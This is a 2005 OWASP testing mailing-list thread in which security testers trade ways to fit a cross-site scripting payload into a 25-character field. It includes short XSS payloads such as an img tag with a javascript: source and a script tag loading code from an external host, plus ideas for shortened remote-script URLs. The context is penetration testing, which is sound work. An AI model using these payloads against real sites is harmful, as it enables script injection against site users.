[OWASP-TESTING] XSS in 25 characters or less

Stephen Venter stephen.venter at gmail.com
Wed May 18 23:11:49 EDT 2005


Yeah, quite right... well, almost - just needed a space and an extra slash:
<img src=javascript:alert() />


On 5/19/05, Alex Smolen <alsmola at yahoo.com> wrote:
> <html>
> <head>
> </head>
> <body>
> <img src=javascript:alert()>
> </body>
> </html>
> 
> This should work in internet explorer
> --- Stephen Venter <stephen.venter at gmail.com> wrote:
> > Eoin
> >
> > I tried setting up a symbolic link with only a
> > single character to a
> > js file and an html file on my website... but the
> > domain name is still
> > too long for your 25 char restriction.  However,
> > strictly speaking,
> > I'd say that, if all you need is to prove
> > susceptibility to XSS, then
> > you could use something simple like inputting text
> > with HTML bold
> > tags... would you agree? Although that does
> > obviously not demonstrate
> > the risk quite as nicely.
> >
> > Anyway, here are some XSS examples I like to use:
> > http://whoozoo.co.uk/XSS-test.htm
> > or: the symlink to that html file is:
> > http://whoozoo.co.uk/x [works ok
> > for XSS so long as the client is using IE]
> >
> > There you will see links to the js file that I
> > symlinked to the single char "j".
> >
> > Alex, can you show a working example of using "img
> > src=" in the way
> > you describe?
> >
> > Regards
> > Steve
> >
> > On 5/18/05, Alex Smolen <alsmola at yahoo.com> wrote:
> > > Actually, you could include the  <img
> > > src=tinyurl.com/whatever>
> > > and have the tiny url point to a java script
> > > somewhere.
> > >
> > > Do I get my pint?
> > > --- Alex Smolen <alsmola at yahoo.com> wrote:
> > > > You could use tinyurl.com to embed a malicious
> > link
> > > > (say, one that executes a XST attack). This
> > still
> > > > requires a windows larger than 25 to get the
> > domain
> > > > to
> > > > execute a malicious XSS, I think.
> > > >
> > > > --- Eoin Keary <eoinkeary at hotmail.com> wrote:
> > > > > Hi,
> > > > > I have a window of 25 chars to perform a XSS
> > > > > exploit.
> > > > > anything more is truncated by the server.
> > > > >
> > > > > <script src=http://a.com/z.js></script>
> > > > >
> > > > > - this is 39 chars
> > > > > We can do HTML injection ("<a href=....") to a
> > > > > degree but anyone any ideas
> > > > > on how to execute script in such a small
> > window
> > > > (25
> > > > > chars)?
> > > > > we need to stay in the same domain (xyz.com)
> > > > inorder
> > > > > to make the attack
> > > > > useful. so redirecting to another domain with
> > the
> > > > > "<a href..." is no good.
> > > > >
> > > > > First correct answer gets a pint of Guinness
> > > > (Larry
> > > > > S, you're not included
> > > > > for the pint as I owe you too many).
> > > > >
> > > > > Eoin
> >
> 


-- 
Stephen Venter
Independent IT Security Consultant
stephen.venter at gmail.com
www.whoozoo.co.uk




More information about the Owasp-testing mailing list